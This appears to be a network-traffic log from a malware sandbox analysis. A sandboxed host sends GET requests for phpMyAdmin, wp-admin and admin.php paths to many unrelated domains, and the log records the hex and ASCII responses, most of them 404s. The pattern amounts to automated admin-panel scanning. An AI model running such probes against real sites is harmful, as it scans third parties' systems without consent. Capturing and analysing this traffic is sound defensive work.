2023-11-30 10:22:42 UTC	1248	IN	Data Raw: 34 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 68 70 4d 79 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 Data Ascii: 4d4<!DOCTYPE HTML><html lang="en" dir="ltr"><head> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <title>phpMyAdmin</title> <meta charset="utf-8"> <style t

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	64107	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	283	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:42 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:42 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:42 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	63934	104.238.144.219	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	170	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:42 UTC	803	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 31 30 38 30 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 68 70 4d 79 41 64 6d 69 6e 5f Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:42 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, max-age=10800Set-Cookie: phpMyAdmin_
2023-11-30 10:22:42 UTC	1248	IN	Data Raw: 34 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 68 70 4d 79 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 Data Ascii: 4d4<!DOCTYPE HTML><html lang="en" dir="ltr"><head> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <title>phpMyAdmin</title> <meta charset="utf-8"> <style t

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	64018	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	167	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:42 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:42 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:42 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	64035	194.63.248.47	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	168	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:42 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:43 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	64325	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	167	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:43 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	64401	216.37.42.12	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:42 UTC	213	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 34 20 44 65 63 20 32 30 30 38 20 31 31 3a 31 30 3a 32 38 20 47 4d 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 39 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:42 GMTServer: ApacheLast-Modified: Sun, 14 Dec 2008 11:10:28 GMTAccept-Ranges: bytesContent-Length: 1997Connection: closeContent-Type: text/html
2023-11-30 10:22:42 UTC	1997	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 47 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 45 43 4f 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 72 72 6f 72 20 34 30 30 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="Generator" content="NOWECO"><meta name="description" content="Error 400"><title>Error 404</title><li

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	64067	104.238.144.219	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	209	OUT	GET /wp-admin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://nrnet.com/wp-login.php
2023-11-30 10:22:42 UTC	221	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:42 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:42 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	64596	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	167	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:43 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	64711	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:43 UTC	167	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:43 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	65394	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:43 UTC	281	OUT	GET /admin.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	764	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
